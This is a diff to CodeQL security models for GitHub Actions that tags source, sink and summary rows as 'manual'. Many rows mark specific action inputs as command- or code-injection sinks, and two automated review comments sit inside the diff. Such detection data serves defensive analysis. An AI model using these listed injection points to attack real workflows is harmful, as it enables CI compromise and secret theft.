+++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"]
\ No newline at end of file
+ - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
index 1727ca60e25..f74ae81a52c 100644
--- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
+++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"]
\ No newline at end of file
+ - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml
index e6688f3805d..c7e2cf41b3f 100644
--- a/ql/lib/ext/getsentry_action-release.model.yml
+++ b/ql/lib/ext/getsentry_action-release.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["getsentry/action-release", "*", "input.version", "output.version", "taint"]
- - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"]
+ - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
+ - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml
index b214178350c..781384a2fe1 100644
--- a/ql/lib/ext/github_codeql-action.model.yml
+++ b/ql/lib/ext/github_codeql-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"]
+ - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml
index 146f4a17a55..9036f199f42 100644
--- a/ql/lib/ext/go-semantic-release_action.model.yml
+++ b/ql/lib/ext/go-semantic-release_action.model.yml
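Review bot: The summary row in `github_codeql-action.model.yml` is keyed on `github/codeql-action`, but workflows reference this action through a sub-path such as `github/codeql-action/analyze`, so the row only takes effect if the matching logic ignores or prefix-matches the sub-path, which this hunk does not show. If matching is exact, the key should carry the sub-action path. If it is prefix-based, a comment above the row such as `# applies to uses: github/codeql-action/<sub-action>` would make that explicit. Either way, a test workflow that passes a tainted value to `output` would confirm the flow to `sarif-output` is actually modelled.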
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["go-semantic-release/action", "*", "input.bin", "command-injection"]
+ - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
index 8c0f7a5ad61..7eee95dbcce 100644
--- a/ql/lib/ext/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"]
+ - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
index 9c7c03b9f35..4fe9e32ce52 100644
--- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"]
- - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
index 9d9eac38af0..0352ece87b5 100644
--- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"]
+ - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
index 4c74301d1c3..712f2ce3395 100644
--- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"]
- - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"]
- - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"]
- - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"]
\ No newline at end of file
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml
index 0534d299627..45c00c1c30e 100644
--- a/ql/lib/ext/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/gradle_gradle-build-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"]
- - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"]
- - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"]
+ - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint", "manual"]
diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml
index a8a528b85c5..8f05918155e 100644
--- a/ql/lib/ext/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/haya14busa_action-cond.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"]
- - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"]
+ - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
+ - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml
index 6a907fcc3a1..708c310c05f 100644
--- a/ql/lib/ext/hexlet_project-action.model.yml
+++ b/ql/lib/ext/hexlet_project-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"]
+ - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
index 6332cbfdad8..76177635899 100644
--- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"]
- - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"]
- - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"]
- - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"]
\ No newline at end of file
+ - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
index f8b8490c213..7106115c17a 100644
--- a/ql/lib/ext/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ilammy/setup-nasm", "*", "input.version", "command-injection"]
- - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"]
+ - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
+ - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
index 64024ef5c72..366e5dd1766 100644
--- a/ql/lib/ext/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"]
- - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"]
- - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"]
\ No newline at end of file
+ - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
index 1771ac2bad0..a469063fc50 100644
--- a/ql/lib/ext/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["iterative/setup-cml", "*", "input.version", "command-injection"]
+ - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
index e8600c6f7df..d0d5b57574b 100644
--- a/ql/lib/ext/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["iterative/setup-dvc", "*", "input.version", "command-injection"]
+ - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
index 2ab70905db1..3151e335d22 100644
--- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection", "manual"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index 2e5b0d42efd..38253b68934 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"]
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
index 948be24b45c..0930fc246c3 100644
--- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"]
+ - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml
index f1a04c9e244..5b344799ad9 100644
--- a/ql/lib/ext/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/jsdaniell_create-json.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"]
- - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"]
- - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"]
+ - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
+ - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"]
+ - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml
index 928c1f918d3..5b6f1342fc4 100644
--- a/ql/lib/ext/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/jurplel_install-qt-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["jurplel/install-qt-action", "*", "input.version", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.dir", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.extra", "command-injection", "manual"]
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
index ad95f1f323a..b34833d85f3 100644
--- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"]
+ - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"]
- - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"]
- - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"]
+ - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
+ - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"]
+ - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection", "manual"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index 18339bfa4e9..bbfc0bed1df 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]
- - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"]
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
index abfca93b4ec..74ef5820cb7 100644
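Review bot: The two added rows in the `khan_pull-request-comment-trigger.model.yml` hunk are identical: both model `output.comment_body` as a "Comment body" source, and the duplicate is carried over unchanged from the old side. If the second row was meant to cover a different output of the action, that output is currently not treated as untrusted and flows from it go unreported; otherwise the duplicate should be dropped so that the file keeps the single row `- ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"]`. Tagging a row `manual` presumably signals that it was hand-reviewed, so this is a good moment to confirm which of the two was intended.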
--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"]
+ - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml
index b3cb5aa3940..e05a3afd63a 100644
--- a/ql/lib/ext/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"]
- - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"]
+ - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
+ - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
index a84880cfdf1..a96ad45d624 100644
--- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"]
+ - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
index f32484a4f0d..a70e8facf7c 100644
--- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"]
\ No newline at end of file
+ - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index 57c35c90214..66280f8bdd6 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"]
- - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"]
\ No newline at end of file
+ - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
+ - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
index 9ce43e68a75..65965daeb1d 100644
--- a/ql/lib/ext/magefile_mage-action.model.yml
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["magefile/mage-action", "*", "input.args", "command-injection"]
+ - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
index ac3aaa67def..ba9a04f588b 100644
--- a/ql/lib/ext/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["maierj/fastlane-action", "*", "input.lane", "command-injection"]
- - ["maierj/fastlane-action", "*", "input.options", "command-injection"]
- - ["maierj/fastlane-action", "*", "input.env", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
+ - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"]
+ - ["maierj/fastlane-action", "*", "input.env", "command-injection", "manual"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
index 90fd673c705..aea054e24b0 100644
--- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"]
- - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"]
- - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"]
- - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection", "manual"]
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml
index 9f621758cff..7a556a0f0ec 100644
--- a/ql/lib/ext/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/marocchino_on_artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"]
+ - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml
index 2c9f46b46f4..bb1c3ffca2a 100644
--- a/ql/lib/ext/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/mattdavis0351_actions.model.yml
@@ -3,14 +3,14 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"]
- - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"]
+ - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
+ - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.tag", "command-injection"]
+ - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.image-name", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.tag", "command-injection", "manual"]
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
index 1bcf8e7ce7a..d3bec5ea39d 100644
--- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"]
+ - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
index dfa441761ab..c65527150b5 100644
--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"]
+ - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml
index 81706744568..25565b445fc 100644
--- a/ql/lib/ext/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"]
- - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"]
+ - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
+ - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"]
